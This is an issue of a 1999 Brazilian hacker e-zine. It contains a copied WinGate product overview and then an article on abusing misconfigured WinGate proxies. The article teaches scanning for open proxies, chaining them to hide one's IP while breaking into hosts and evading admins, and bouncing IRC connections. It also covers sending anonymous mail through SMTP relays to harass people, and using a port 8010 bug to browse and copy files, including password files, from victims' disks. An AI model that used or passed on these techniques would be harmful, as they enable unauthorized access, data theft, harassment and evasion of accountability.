  
       ________      ______         _____       _______        _______                                  
      |XXXXXXXX|    /XXXXXX\       |XXXXX|     |XXXXXXX\      |XXXXXXX\                
      |XXXXXXXX|   |XXXXXXXX|     /XXXXXXX\    |XXXXXXXX|     |XXXXXXXX|                  
      |XX|         |XX|  |XX|    |XX|   |XX|   |XX|  |XX|     |XX|  |XX|                  
      |XX|         |XX|          |XX|   |XX|   |XX|__|XX|     |XX|__|XX|                 
      |XXXXXX|     |XX|          |XX|   |XX|   |XXXXXXXX|     |XXXXXXXX|               
      |XXXXXX|     |XX|          |XX|   |XX|   |XXXXXXX|      |XXXXXXX/                 
      |XX|         |XX|          |XX|   |XX|   |XX|\XX\       |XX|                 
      |XX|         |XX|__|XX|    |XX|___|XX|   |XX| \XX\      |XX|                     
      |XX|         \XXXXXXXX/     \XXXXXXX/    |XX|  \XX\     |XX|                        
      |XX|          |XXXXXX|       |XXXXX|     |XX|   \XX\    |XX|                            
       
     =======   =   =    =   =====                          
          =    =   = =  =   =            
        =      =   =  = =   ===   
      =        =   =   ==   =     
     =======   =   =    =   ===== 





{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}
{}       CONNECTING TO THE FC0RP DATA TRASNFER, PLEASE WAIT ....          {}
{}  TRANSFERING DATA, FC0RP ZINE #02 COMMING , WAIT .....                 {} 
{}          GEE !! ARE YOU STILL WAITING ? GO AHEAD DUMMIE !!!            {}
{}      DATA TRANSFERED, THE ZINE #02 IS HERE!!!!                         {}  
{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}

             || F0RBIDDEN CORPORATION ||     -= THE WORLD DOMINATION =-




                        _______________________________
                       /_______________________________\
                      //    _-_-_FC0RP ZINE_-_-_       \\ 
                      ||                               ||
                      \\ Mes: Junho / 99               //
                      // Numero: 02                    \\
                      \\ Get in: www.fcorp.cjb.net     //
                      || Edited by: Falko e ThAnATh0s  || 
                      //                               \\ 
                      \\_______________________________//        
                       \_______________________________/






                                _,.-----.,_
                              ,-~           ~-.
                            ,^___           ___^.
                           /~"   ~"   .   "~   "~\
                          /  ,--._    I    _.--.  \
                          | /     ~-. | ,-~     \ |
                          | | (=)    }:{   (=)  | |
                          j l       / | \       ! l
                       .-~  (__,.--" .^. "--.,__)  ~-.
                      (           / / | \ \           )
                       \.____,   .  \/-\/  .   .____./
                        ^.____                 ____.^
                           | |T .\  !   !  /. T| |
                           | |l   _ _ _ _ _   !| |
                           | l \/V V V V V V\/ j |
                           \  \ \|_|_|_|_|_|/ /  /
                            \  \[T T T T T TI/  /
                             \  `^-^-^-^-^-^'  /
                              \               /
                               \.           ,/
                                 "^-.___,-^"

                                      
                "O homem nasce bom,a sociedade  é que o corrompe"
                                    Jean-Jacques Rosseau            



                        
                          __________________________                  
                         {                          }                          
                        {{          INDICE          }}                         
                       {{{                          }}}                        
                      {{{{__________________________}}}}                                                  
                     {{{{{{{{{{{{{{{{{{}}}}}}}}}}}}}}}}}}                                                                                                               
                    {{{{{{{{{{{{{{{{{{{}}}}}}}}}}}}}}}}}}}                                                               
          __                                                      __
         {__}____________________________________________________{__}                                                  
         |  |                                                    |  |               
         |  |Introducao...............................Fc0rp Team |  |                    
         |  |Wingate.........................ThAnAtH0s/Sycofluid |  |                   
         |  |Ircproxy..................................ThAnAtH0s |  |              
         |  |Lammer do mes.............................ThAnAtH0s |  |               
         |  |B00kmark..................................ThAnAtH0s |  |            
         |  |Pequenas notas............................ThAnAtH0s |  |
         |  |IcqWebserverBug.........................._Neptunus_ |  |
         |  |Mirc 5.6......................................FalkO |  |
         |  |                                                    |  |
         |  |       Bonus Track #1.....................ThAnAtH0s |  |
         |  |       Bonus Track #2.....................F0rBiDDeN |  |
         |  |                                                    |  |             
         |__|____________________________________________________|__|                                      
         {__}                                                    {__}   
                                                            


                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |             INTRODUCAO                | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}

       
                        
Uhu cole galera! a cada edicao do zine vejo a nossa evolucao, e bom saber que
estamos evoluindo em termos de conhecimento, nossos integrantes estao se dedi
cando ao maximo(o possivel) para isso e estou satisfeito. Os programmers do 
grupo ( Velhinho e _Neptunus_ ) estao tendo bastante trabalho fazendo o troj
an e outros proggies legais. Ps: Bl4ck-di3 e o HTMLer do grupo mas como vcs 
jah sabem (se vc nao sabe vai saber agora ) deu um pau la no pc dele e fudeu
todinho, ai ele ficou de comprar outro mais como a situacao nao esta boa a 
mamy dele so vai comprar outro daqui a um tempinho entao ele vai estar meio
away do grupo :\




                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |               WINGATE                 | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}






WinGate é um servidor proxy e firewall que permite a vocêcompartilhar 
uma simples (ou multiplas) conexões Internet com a sua
rede local. A conexão com a Internet compartilhada pelo Wingate pode
ser de qualquer tipo, incluindo discagem via Modem, ISDN, xDSL, cable
modem, conexão via satélite, ou qualquer circuito dedicado T1.

O WinGate requer uma rede TCP/IP e precisa estar instaldo em uma
máquina Windows 95/98 ou Windows NT, mas este computador NÃO
precisa ser dedicado para operar o WinGate.

O primeiro beneficio do WinGate é a habilidade de compartilhar uma
conexão com a internet para toda a sua rede local. Isso elimina a
necessidade de linhas telefonicas adicionais, outras contas de acesso
com o provedor, modens, ou qualquer outro hardware para compartilhar
este acesso multiplo. Compartilhando esta única conta com o Provedor e
usando apenas uma linha telefonica, na sua casa ou negócio você pode
perceber a redução de custos imediatamente.

Além de adicionar a solução de compartilhamento da conta, WinGate
também protege a sua rede local como um componente firewall. O
WinGate firewall impede o acesso a sua rede local por intrusos,
restringindo os endereços IP que podem acessá-lo.

O WinGate também contém inúmeras característiscas avançadas para
que voce possa administrar e optmizar a sua conexão Internet. O
WinGate salva toda a sua atividade na Internet, que pode ser revisada
para monitorar uso e também permite a você restringir o acesso a Sites
específicos. O WinGate Professional pode restringir este acesso a
determinados usuários da sua rede ou a grupos . WinGate também
possui um cache HTTP que melhora a performance da sua conexão
Internet.

Como o WinGate funciona

Com um único computador, você pode compartilhar simultaneamente
esta única conta na internet com diferentes requisições de diversos
programas usados na Internet (ex: você pode checar e-mail, ver uma
página WEB ou fazer "download" de um arquivo via FTP ao mesmo
tempo). O WinGate extende as capacidades do computador ligado na
Internet com outros computadores na rede, e adicionando também outras
capacidades.

Para compartilhar sua única conta é necessário apenas o software
WinGate, sem hardware adicional requerido. Com a rede TCP/IP entre os
computadores e um modem (ou qualquer outro tipo de conexão), o
WinGate provê acesso a todas as suas máquinas.

Com o lançamento da versão 3.0, o Wingate combina um software
servidor e um software cliente (as versões mais antigas usavam apenas
um software servidor). O componente servidor é instalado no computador
de sua rede que possui o modem ou outra conexão Internet, e o
componente cliente é instalado nas aoutras máquinas da sua rede. O
componente servidor rotea os pedidos à Internet feitos pelas estações
clientes pelo proxy através de uma única conexão Internet; o componente
cliente do   WinGate automaticamente configura todos os computadores
clientes para assegurar que os pedidos à Internet sejam roteados para e
do servidor WinGate.

Com o WinGate instalado na sua rede local, acessar a Internet tanto de
seu computador servidor WinGate quanto de qualquer dos computadores
clientes parecerá virtualmente igual. Usuários da rede podem usar quase
qualquer aplicação Internet como se estivessem usando sua própria
conexão Internet. O WinGate também inicia uma conexão Internet ou a
desconecta através de um pedido feito por qualquer computador da rede,
portanto os usuários de estações clientes podem iniciar um acesso
Internet mesmo se não estiverem usando o servidor WinGate que possui o
modem ou outra conexão Internet.

Já que todos os pedidos Internet são roteados através do computador
servidor WinGate e do software WinGate, o Wingate habilita o
oferecimento de outras funções também.

O WinGate possui um componente firewall seguro que previne intrusos de
acessarem a sua rede interna através de sua conexão Internet. O
WinGate consegue isto indentificando os pedidos para acesso à sua rede
e verificando se ao endereço IP deste pedido foi permitido o acesso à rede
interna, assim como binding as portas de comunicação necessárias para
usuários de fora acessarem a rede interna. O componente firewall do
WinGate está disponível em todas as versões do software WinGate.

O History View do WinGate permite que você reveja um resumo de todos
os pedidos Internet, incluindo sites WEB visitados, tempo gasto online,
etc... A versão Professional também permite que você especifique direitos
à usuários ou grupos de usuários, incluindo quais usuários têm acesso a
quais serviços

O WinGate 3.0 tem o conjunto de características mais
avançado e facilitado de qualquer outro servidor
porxy/firewall do mercado.

WinGate Home.

Se você tem dois ou mais computadores em sua casa, o
WinGate home é a solução ideal para criar e gerenciar sua
própria rede pessoal, o WinGate Home é fácil de instalar e usar
com a nova versão do WinGate 3.0.

WinGate Standard.

WinGate Standard oferece um custo efetivo para
compartilhamento de rede e acesso a Internet para pequenas
empresas e redes de médio porte. Veja alguns dos recursos do
WinGate Standard abaixo, e os recursos oferecidos no WinGate
3.0!

WinGate Pro.

WinGate Pro oferece diversificadas seleções e recursos, que são
ideais para as necessidades de grandes empresas com redes de
trabalho.

Servidor DNS.
O servidor DNS é uma implementação parcial. Ele provê
funcionalidade suficiente para usar o servidor SOCKS para
pedidos SOCKS4. O servidors DNS do WinGate integra -se com
o servidor DHCP para permitir resolução de DNS para nomes
de computadores de sua rede. Se maior funcionalidade é
requerida, mapeamentos de proxies podem ser usados para
encaminhar todos os pedidos DNS a um servidor DNS
totalmente implementado. Alternativamente, você pode rodas
um servidor DNS stand-alone na máquina WinGate server.

WWW Proxy.

O WinGate 3.0 WWW Proxy funciona como HTTP/1.0 um cache
compativel com o HTTP proxy server. Ele irá suportar
requerimentos de FTP, e SSL. O WinGate WWW proxy é como
um Web server com listagem de diretórios, na versão NT suporta
até CGI. Os recursos incluem opções para manusear
normalmente (os não-proxy's) os requisitos de diversas formas
variadas, o que proporciona uma ótimo apresentador para seu
servidor WWW, ou um site automatizado com ferramentas de
espelhos. Que irá se estender para outro proxy ou servidor
SOCKS 4.

Expandindo o usuário do banco de dados.

O Usuário do banco de dados poderá conectar e autenticar
individualmente. Grupos de usuários podem ser definidos, e
podem acessar o usuário ou um grupo de base. Com o WinGate
3.0 Agora você pode separar grupos ou separar grupos dentro
de grupos, para maior flexibilidade. O WinGate WWW Proxy tem
o Java Autentication Client, ele permite que os administradores
possam fazer uma autenticação WWW sem que os usuários
tenham que utilizar o GateKeeper ou o WGIC. Quando um
usuário não autenticado tenta acessar uma página Web que
requer autenticação, o WinGate exibe uma página de
autenticação usando uma janela em java para fazer a
autenticação.

Servidor DHCP.

Toda rede de trabalho do cliente foi automatizada pelo DHCP e
se estende por toda rede local de trabalho.Completamente
automático ou manual o DHCP do WinGate irá designar e
configurar o seus números IP e seus DNS para todos as suas
máquinas clientes. O servidor DHCP faz parte de todas as
licenças do WinGate 3.0.

Servidor SOCKS.

O WinGate 3.0 SOCKS server é como o SOCKS 4 e o SOCKS 5
(RFC 1928). Ele Suporta a autenticação RFC 1929 para usuários
adicionados na base de dados de usuários do WinGate. O
WinGate SOCKS server reconhece o serviço HTTP. Ele pode
interceptar pedidos HTTP e manusear com o WinGate WWW
proxy embutido. Isto significa que até mesmo seus usuários
SOCKS poderão aproveitar os beneficios do WWW proxy
(exemplo: cache) e os mesmos podem ser incluidos nas políticas
de segurança.

Capacidade do não-proxy.

O não-proxy necessita do (NPR) para capacitar muitos dos
prxies do WinGate tanto como outros serviços para integração
semelhante com o WinGate, sem conflitos ou necessidade de
uso de portas diferentes. Nenhum non-proxy. Qualquer
requisição não-proxy ao WinGate pode ser roteado para outro
servidor. Isto proporciona ao WinGate controle de acesso a
outros servidores, que podem não ter a mesma flexibilidade de
acesso a controles que o WinGate tem.

Rota de Mapeamento Proxy.

A rota de mapeamento de proxies no WinGate
proporciona conectividade genérica para as
aplicações TCP e UDP que não suportam
protocolos proxies. As Rotas de mapeamento
tambem podem mapear links nos usuários ou
perfis de discagem dentro da Internet ou de sua
rede local.

Autenticação de Cliente.

A autenticação é possível através do WGIC. O proxy WWW do
WinGate incorpora uma ferramenta de autenticação Java. Isto
permite aos administradores a requererm autenticação sem a
necessidade do cliente rodar o GateKeeper. Quando um usuário
não autenticado tentar acessar uma página WEB, uma página
'Sorry' e um applet de logon irão aparecerão.

Capacitação de múltiplas interfaces.

O WinGate faz múltiplas conexões a Internet
para proporcionar melhor transferencia de
dados e acesso rápido a combinações de
modems ISDN e conexões diretas são
configuradas "por serviço" para proporcionar a
você total controle e aumentar

Administração remota.

O WinGate 3.0 é controlado e configurado
usando uma ferramenta de administração
remota chamada GateKeeper, que se comunica
com o WinGate por uma conexão segura de
TCP/IP, para todas as configurações,
monitoramentos e controles o GateKeeper pode
ser usado de qualquer máquina com uma
conexão TCP/IP a máquina WinGate. O serviço
que proporciona isto é o serviço de controle
remoto (Remote Control System). O GateKeeper
é usado para configuração não só na Internet
mas tambem para acessar a ele mesmo. Você
não necessita usar o GateKeeper para acessara
Internet.

Agendamento.

A agenda permite que o administrador controle muitas
operações do sistema e do WinGate em bases padrões. Muitas
operações podem ser automatizadas, incluindo arquivo Log,
desligamento do Wingate e aomandos de linha de execução.

Proxy FTP.

O Proxy FTP provê acesso à servidores FTP. Usa o método
nomedousuário@nomedoservidor do firewall transversal. O proxy
FTP suporta pedidos não-proxy. Isto faz com que o proxy aja
como um apresentador para um servidor FTP ou visualizar em
outras janelas de outros servidores proxies.

Regras.
Um sofisticado conjunto de regras do sistema de firewall permite
controle de como o servidor WinGate é utilisado, incluindo
direitos de serviço, direitos de sistema e interação com grupos e
usuários.

VDO Proxy.

Este proxy aciona todos os usuários na LAN para aproveitar
vídeos ao vivo usando o Streeming video Player da VDONet
Corporation. Para isto você necessita ter certeza que tem em
seu proxy a versão capacitada do VDOLive Player. O
manuseamento do não-proxy permite que você execute o seu
próprio servidor VDO, que o WinGate pode ser a sua tela de
administração.

Xing Streamworks.

O XDMA proxy Proporciona aos clientes Xing Streamworks a
executar operações em sua própria rede.

POP3 Proxy.

O WinGate POP3 proxy permite acessar
servidores POP3 na Internet para receber
E-mails. Como o WWW e o FTP proxies, o POP3
proxy pode agir como um apresentador do seu
servidor POP3, dando a você uma integração
menos parecida do sistema de mails. E tambem
pode ser visualizado por outras janelas de
servidores proxies.

Telnet Proxy.

O WinGate Telnet proporciona acesso a
servidores Telnet. P Telnet proxy no WinGate
3.0 suporta muitos clientes Telnet incluindo o
Unix. Telnet tambem pode ser visualizado em
várias janelas. O Telnet proxy suporta
autenticação de usuários para maior segurança.

RealAudio Proxy.

O RealAudio Proxy proporciona aos usuários da
rede acesso ao servidor RealAudio para
straming audio e video. A versão do
Proxy-aware do RealAudio Player (versão 2 ou
superior) é necessária. O manuseio do servidor
non-proxy permite que você use seu próprio
servidor RealAudio, que no WinGate pode Ter
uma tela de administração tambem.

Discagem por Demanda.

A discagem por demanda permite um uso mais
conveniente para realçar a necessidade de inciar
uma conexão a um servidor Internet. A
discagem do WinGate 3.0 suporta várias
configurações de diferentes números de
telefones.

Funciona como um serviço.

O WinGate 3.0 Funciona como um serviço sobre
o Windows NT e o Windows 95/98! Isto significa
que o WinGate começa a funcionar quando o
Windows se inicia.

Fácil Configuração.

O novo WinGate Internet Client irá configurar
automaticamente a máquina cliente para usar o
WinGate 3.0 no compartilhamento da Internet, e
não será mais necessário configurar as
aplicações, da forma mais simples e fácil,
usuários rapidamente conseguirão manusear as
máquinas clientes como a máquina servidor.

Fazendo Cache HTTP.
Novidade do WinGate 2.1 - cache HTTP customizável! Cache
HTTP é o processo de armazenar gráficos recentemente
acessados da Internet, documentos HTML ou outros arquivos na
máquina WinGate, permitindo acesso mais rápido na próxima
vez.

Tipos de Pedidos.
O proxy WWW do WinGate 2 é configurável para permitir
pedidos tanto proxy quanto não-proxy, permitindo que pedidos
proxy sejam manejados normalmente ou enviados a um servidor
WEB, ou um disco.

Contabilidade.
Uma super ferramenta de gerenciamento de LAN que permite a
você monitorar o tráfego e até mesmo calcular valores para
cobrança, com atualização em tempo real.

Auditoria / Logging.
Poderosa nova ferramenta de auditoria permite que você
rastreie as ações dos usuários, incluindo violações de licençasm
tráfegos de sessões, início e término de sessão, quebras de
autorizações, e muito mais!

Direitos e Política.
A segurança no WinGate é gerenciada através da designação de
direitos individuais e para um grupo. Existem diversos direitos
que podem ser designados para todo o sistema.

Mapped Links.
Mapped links (às vezes chamados de "plugs") são usados para
suportarem aplicações que não suportam atravessar um firewall,
ou trabalharem através de um servidor proxy. Inclue aplicações
como IRC e NEWS.
 
Bem essa parte de wingate eu peguei ai na net, um bom material explica muito
bem,sem rodeios o mal e que vangloriza muito a sua suposta seguranca, como 
dizem NADA e seguro!!! E nesse texto esta a parte boa do wingate, agora vamos 
ver  a parte Mauzinha....
vamos ver o que vc pode fazer com wingates =]     Essa outra parte foi feita
pelo sycofluid, muito boa essa materia, eu estava fazendo uma mas achei essa
melhor ;P Tks sycofluid.( HackPhr Zine, #6 http://hackphr.8m.com)



*** =-=-= InTrOdUcAo =-=-= ***


	y0 manows! A ideia de escrever esse texto sobre wingate me veio em uma
de minhas conversas com o meu manow BLAcK MaSK, em q discutiamos as varias              
vunerabilidades e coisas interessantes q davam para  ser feitas com esse
progz. A primeira vista, o Wingate parece um negocio bem lammah mesmo... bem
Rwindows, e no fundo eh isso mesmo! Entao pq catzo eu estou escrevendo sobre
ele?! O motivo estah justamente no fato de ele ser um programa tao lammah e
tao mal planejado: ISSO NOS PERMITE FAZER COISAS MUITO INTERESSANTES E 
UTEIS :)))).
        Bom, pra comecar: que diabos eh WINGATE? Bom, se voce eh lammah o
suficiente  para nunca ter ouvido falar em wingate acho q vou ter que dar
uma breve explicacao ;). Wingate eh um programa feito pela Qbik New Zealand
q permite q vc divida uma conexao discada ou direta a Internet com varios
computadores, e nao apenas com um, como costumamos ver. Assim, se vc tem uma
rede de computadores e um deles tem um modem ligado a uma linha telefonica,
vc pode utilizar o Wingate nesse micro para q todos os micros de sua rede
acessem a Internet, atraves de uma unica conexao discada, um unico IP. Bom,
chega de propaganda :)! Hora de chegar ao ponto q interessa: assim, o Wingate
tranforma esse "computador principal" em um gateway a Internet, por onde
passam os dados de todos os outros micros da rede. Portanto, como vc ja deve
ter imaginado, o wingate funciona como um servidor Proxy e uma "firewall"
(pfffff...wingate? firewall? hauhahuhahuauhauhhua). Sendo um servidor proxy, 
o wingate apresenta uma serie de servicos (proxy daemons) em diferentes portas
TCP e eh nelas que estah o nosso grande objeto de interesse!! Ao trabalho!


*** =-=-= PrOcUrAnDo PoR WiNgAtEz =-=-= ***


	Para se aproveitar das fraquezas e bugs do wingate, a primeira coisa
q vc precisa fazer, obviamente, eh achar na net maquinas rodando o programa.
Bom, primeiro, logicamente, vc precisa saber onde vai comecar a procurar. Os
servidores com Wingate sao muito comuns em provedores rodando SO Micro$hit, ou
seja, Windows NT e Windows 95. Assim, se vc ver um provedor rodando "WAR-FTPD"
:p, tenha-o como um forte candidato de estar rodando Wingate em uma de suas
maquinas. Tambem eh comum a presenca do Wingate em computadores de usuarios
domesticos, mas como esses normalmente possuem IP dinamico e nao deixam seus
micros conectados 24 horas por dia, pode esquecer dos lammahs :)). Ja definido
o provedor onde voce vai procurar, falta arrumar um programa que scanneie o
intervalo de IPs que voce vai especificar. Caso esteja usando Windows 95,
a melhor escolha eh mesmo o wGateScan, disponivel em http://www.warforge.com.
Caso voce queira scannear do seu Linux, da uma passada la na rootshell
(http://www.rootshell.com), dah um search em "wingate" e vai aparecer um
programa do tipo do wGateScan. Vou presumir que voce ja tenha descoberto como
utilizar o programa e portanto, não vou perder tempo e linhas de texto
escrevendo sobre isso. Uma questao importante entretanto, eh COMO que estes
programas realizam a busca. Repare que o wGateScan tem 3 metodos de procura
mas nos soh vamos nos concentrar no primeiro, que eh o mais utilizado.        
	Quem jah debulhou ou mesmo deu um simples portscan num wingate jah 
deve ter conhecimento da classica porta 23 com seu prompt "Wingate>", marca
registrada de qualquer Wingate Proxy. O Scanner tenta conectar na porta 23 de
cada IP do intervalo que voce especificou e, se a conexao for estabelecida,
tenta receber dessa porta o string "Wingate>", indicando entao a existencia 
ou nao do proxy.

**Co0lz!**

        Quando terminar de scannear, o programa te mostra a lista de Ips que
ele encontrou rodando Wingate e PrOnToW :)! Ai Voce jah tem todas as suas
ferramentas!

...4g0r4, p4R4 4 p4rt3 1nT3r3554nt3 @:)...


*** =-=-= !!! AtAkEz E TrUkEz !!! =-=-= ***


1 - TELNET BOUNCE

        Esse eh de longe o ataque envolvendo wingates mais conhecido, mais
simples e dependendo das suas necessidades, o mais util e animal de todos! Seu
funcionamento eh mesmo muito simples: lembra da porta 23 e do prompt Wingate>?
Entao...normalmente prompts existem para que escrevamos algo neles concorda?
Logo, conecte na porta 23 de um Wingate e digite o seguinte:

Wingate> www.qualquerum.com 80
            (host ou IP)  (porta)  

Adivinha soh o que vai acontecer? Sim! Atraves do Wingate, voce se conectara a
outra maquina e nao serah o seu IP a ficar logado em www.qualquerum.com
mas sim o do wingate! AHUAhuaHUAhuAHUauuAUHahuAa! Sentiu soh o poder da coisa?
Ae vai um esquema para voce vizualizar melhor:

SEU MICRO -----------------  WINGATE -------------------- HOST ALVO
(1.2.3.4)                   (5.6.7.8:23)                (10.10.10.10:X)

        Como voce ta vendo, o Wingate age como um intermediario na conexao
entre seu micro e o HOST ALVO. Assim, se eu conectar, por exemplo, em
10.10.10.10:23 (telnet), nao eh o seu IP que ficara logado (1.2.3.4) mas
sim o do wingate (5.6.7.8). Sabe o que que isso quer dizer?

!!! A-N-O-N-I-M-I-D-A-D-E :PPP !!!

        Mas entretanto, apesar de o teu IP nao ficar logado, o FDP do admin do
HOST ALVO pode muito bem ir atras de voce, contactando o ADMIN do wingate e 
cacando seus logs NO PROPRIO WINGATE! O cara tem que ser um cusao total pra 
fazer isso, mas que admin nao eh? A solucao eh fazer um chamado "WINGATE BOUNCE 
CHAIN", o que eh nada mais nada menos que nao apenas um, mas varios wingates 
intermediando sua conexao com o HOST ALVO. Para fazer isso voce vai digitando 
os IPs dos varios wingates nos prompts Wingate>, vai conectando de Wingate em 
Wingate ateh achar que jah eh o suficiente e finalmente entao conectar-se no 
HOST ALVO.
        Imagina soh como vai ser pro pobre do ADMIN?? HAUHuhaUAHuAHUahuAHa!
Ele vai comecar a te perseguir pelos wingates e se tiver energia para ir ateh
a metade, de lah nao vai sair pois vai se deparar com um Wingate que nao loga
as conexoes! Bye Bye r00t MuthaFucka!
        Dessa forma, quando voce for abrir uma secao telnet no host do sujeito
pra tentar rootear a maquina ou fazer qualquer outra coisa que exiga anonimidade,
um Wingate torna as coisas mais seguras ainda pra voce pois mesmo se voce for 
burro o suficiente para nao apagar os logs, o IP logado nao serah o seu, mas sim 
o do WynGayti! :)))).

2 - IRC BOUNCE
 
        Hehehehe! Esse aqui eh realmente um dos mais c00lz tambem, aquele mais
utilizado pela galera do IRC e por aqueles que querem um pouco de privacidade
e seguranca (e nao um monte de lammahs flodando e nukando a toda hora). O
esquema eh parecido com o do ataque anterior: voce se utiliza de uma maquina
rodando Wingate para bouncear o teu IP e colocar o do proxy no lugar. Assim,
voce tem anonimidade no IRC tb! UEHUehuHUhuEHUehuEUeheUHE! Para bouncear no IRC 
voce pode se utilizar de dois metodos, descritos abaixo.

METODO 1 - Telnet Proxy (denovo??!!) :)

        Hehehehe.... aqui estah novamente a porta 23 entrando em cena! Sim, achar
uma porta 23 aberta com um prompt de "Wingate>" abre um leque de possibilidades,
aqui vai uma! Bom, em primeiro lugar, obviamente voce precisa achar uns Wingates 
e quando isso for feito, abra seu cliente IRC (pode ser qualquer um...mIRC...
BitchX... nao importa) e comece a digitar os comandos:

/server xxx.xxx.xxx.xxx 23 (o ip do wingate + a porta que voce deseja conectar,                            
                            a 23 nesse caso)

Entao vai aparecer um monte de coisas escritas na tela e voce da o comando:

/raw irc.xxxxxx.com.br 6667 (o servidor irc que voce quer conectar + sua
                             porta, que normalmente eh a 6667)

        A conexao ao servidor serah iniciada e quando voce receber o aviso de
conexao estabelecida digita os comandos a seguir, substituindo os campos entre <>
por seus dados.

/raw user <nome de usuario> <email> <UID> <digite qualquer coisa>

/raw nick <seu nick>

	E pronto! Hueueueuueueh! Voce ja estah bounceado! Pode dar um whois em
voce mesmo pra conferir: o IP mostrado serah o do wingate e nao o seu proprio!
Eu, SycoFluid, nao gosto muito desse metodo pois pode levar muitas tentativas
ateh q vc consiga conectar e usar o mIRC normalmente. Por isso prefiro bouncear
pelo SOCKS proxy, metodo descrito abaixo

METODO 2 - SOCKS Proxy

	Como ja disse hah algumas linhas atras, prefiro esse metodo do que o 
primeiro pois eh mais simples e ligeiramente masi rapido. Alem disso muitas
redes IRC jah tem ou estao implantando protecoes contra o IRC Bouncing via 
Telnet enquanto esse segundo eh absolutamente legal e nao eh baseado em 
nenhuma "falha de sistema".
	Comecarei dando uma pequena introducao ao SOCKS Proxy. Pelo proprio
nome, voce percebe qual eh a sua funcao e para que eh utilizado. Assim como 
temos o Telnet Proxy, o FTP Proxy e o HTTP Proxy, temos o SOCKS, rodando na 
porta 1080, que serve como proxy para aplicacoes que nao tem um gateway 
especifico para elas. Como exemplo disso temos o ICQ, o mIRC e outros varios. 
Mas eh importante ressaltar que o SOCKS Proxy nao estah presente apenas no 
Wingate, mas tambem em outros varios como o StarTech e o Microsoft Proxy Server. 
Repare no SETUP do seu mIRC q existe suporte a SOCKS como opcao, na guia Firewall. 
Ops! Voce disse Firewall? YepZ! E eh isso mesmo, pois alem do SOCKS Proxy esconder 
o teu IP, colocando o dele no lugar, ainda pode filtrar ou bloquear os DCC's 
entre outras coisas. Pode-se dizer que eh uma "firewall remota" ;))) (pois 
nao estah na sua rede local).
	Eu espero que vc e seus neuronios ja tenham sacado o esquema depois de toda
essa explicacao que eu dei. Bom, na guia Firewall, caso voce tenha o mIRC 5.4, voce
devera optar entre duas versoes de SOCKS: 4 ou 5. A versao 4 estah presente no Wingate
1.1 e no 2.1 enquanto o SOCKS 5 soh foi introduzido na versao 2.1. Se nao tiver certeza
da versao do Wingate, escolha logo SOCKS 4 ou tente os 2. Apos fazer isso voce digita 
o IP ou DNS do Wingate na caixa de texto HOSTNAME e a porta em PORT (normalmente 
jah estah em 1080, que eh a porta padrao do SOCKS, entao desencana).
	Dai entao eh soh conectar normalmente ao seu servidor IRC predileto como voce
sempre faz e entao de um WHOIS em voce mesmo e TATATATATATATATATATATA! Bingo! Estah 
mostrando o IP do Wingate e nao o seu! Ihaaaaaaaa! Mas atencao: como voce nao estah em
conexao direta com o servidor IRC, mas sendo intermediado por um Wingate, espere 
alguma LeRdEzA no seu BATIPAPU :)), assim tambem como no TELNET BOUNCE ATACK.


3 - SMTP RELAY


	Hehehehe! Hora de mudar um pouco de servico e passar para o e-mail!
Como vc deve saber, o protocolo usado por servidores de e-mail no envio de
mensagens via Internet eh o SMTP.

*** Help a Lammah!!: SMTP = Simple Mail Transfer Protocol

        E assim como no caso do SOCKS, se voce tiver atras de uma "firewall rodando
wingate"(pffffff ahuuhauhahuahua) voce vai precisar de algum Proxy daemon que
redirecione seus e-mails para alem da firewall, para a grande e vasta NET!
Desse modo, no Wingate temos um servico de SMTP proxy que realiza uma funcao
chamada relay, redirecionamento traduzindo-se para o portugues. O mail proxy
mantem uma conexao com um servidor de e-mail "real" e dessa forma, atua
exatamente como um gateway a esse SMTP server. E adivinha soh que vantagens vc 
pode tirar disso? UHueuehueheuheuehuehueh...Exato! o Proxy modifica o cabecalho 
da mensagem e coloca o IP dele no lugar do seu e voce ja manjou o esquema neh? 

ANONYMOUS MAIL! Hueeuueueueuhueuheuhuhehu

	Para comprovar, soh mude o seu servidor SMTP nas configuracoes do seu
programa de e-mail para o IP do Wingate (certificando-se antes, obviamente, se
ele estah com o SMTP Proxy ativado) e mande mensagens "limpas e puras" para todos
os sysadmins e lammahs que voce odeia e gostaria de ver com as tripas para fora,
sabendo que eles nao vao saber quem voce eh, e mesmo que suspeitem, nao vao ter 
como provar que eh voce!

UEHuEHuehUEEUheuEH.....Brincadera viu....nao faca isso nao ou voce estarah se 
tornando num lammah

	"Use-o sabiamente meu filho, ou entao iras sentir a ira do senhor!"
                                                    SycoFluid, Versiculo 666


Fica com voce decidir o que eh "sabiamente" nesse caso..hueuheuheuhehuehuhehueuhehe.


4 - A PORTA 8010 (soh funciona em vers. 2.1 e se a porta 8010 estiver ativada!)


	Ateh agora a gente se concentrou em ataques que apenas se utilizavam do 
wingate (bounceando atraves dele), mas nao o tinham como HOST ALVO. AGORA, as 
coisas mudaram um pokinho ueuheueuue :))))....nossa atencao estah totalmente
centrada no wingate, tendo ele como a vitima de nossas diabruras! uehehuehue...
	Vou te dizer meu manow, esse bug eh muito, muito, mas realmente muito
LOOOKKKKKKOOOOOO! Demonstra mesmo a falta de competencia dos programadores do
wingate e rebaixa mais ainda a reputacao deste! 

"Bah! Esse cara deve tar falando de um bugzinho moh lammer que nem funciona!"

	Bom, eh um bugzinho lammer mesmo....voce APENAS PODE LER E COPIAR PRO TEU
MICRO QUALQUER ARKIVO DO HD DO CARA, OU SEJA, AS UNICAS COISAS QUE VOCE NAO
PODE FAZER SAO DELETAR, CRIAR E EXECUTAR PROGRAMAS! AHHhuaUHAhuAHUahuAHUahuA!
Sentiu o poder do bixo? E o pior de tudo: eh ridiculo de facil!! Se isso nao for
demais para os seus neuronios, abra seu browser qualquer e digite:

http://ipdowingate:8010// (isso mesmo...duas barras)

e UAHUahuAHUahuHAUahuHA! Voce tem uma lista completa de todo o HD do cara..com
pastas e tudo! Pra mudar de diretorio eh soh acrescentar o nome da pasta depois
do // (clicar nela no browser nao vai adiantar). Imagina soh esse truquezim pra
pegar os PWL's do cara.....AIIIIIIII :)))! Bom..eeheuuheuue..use sua imaginacao!
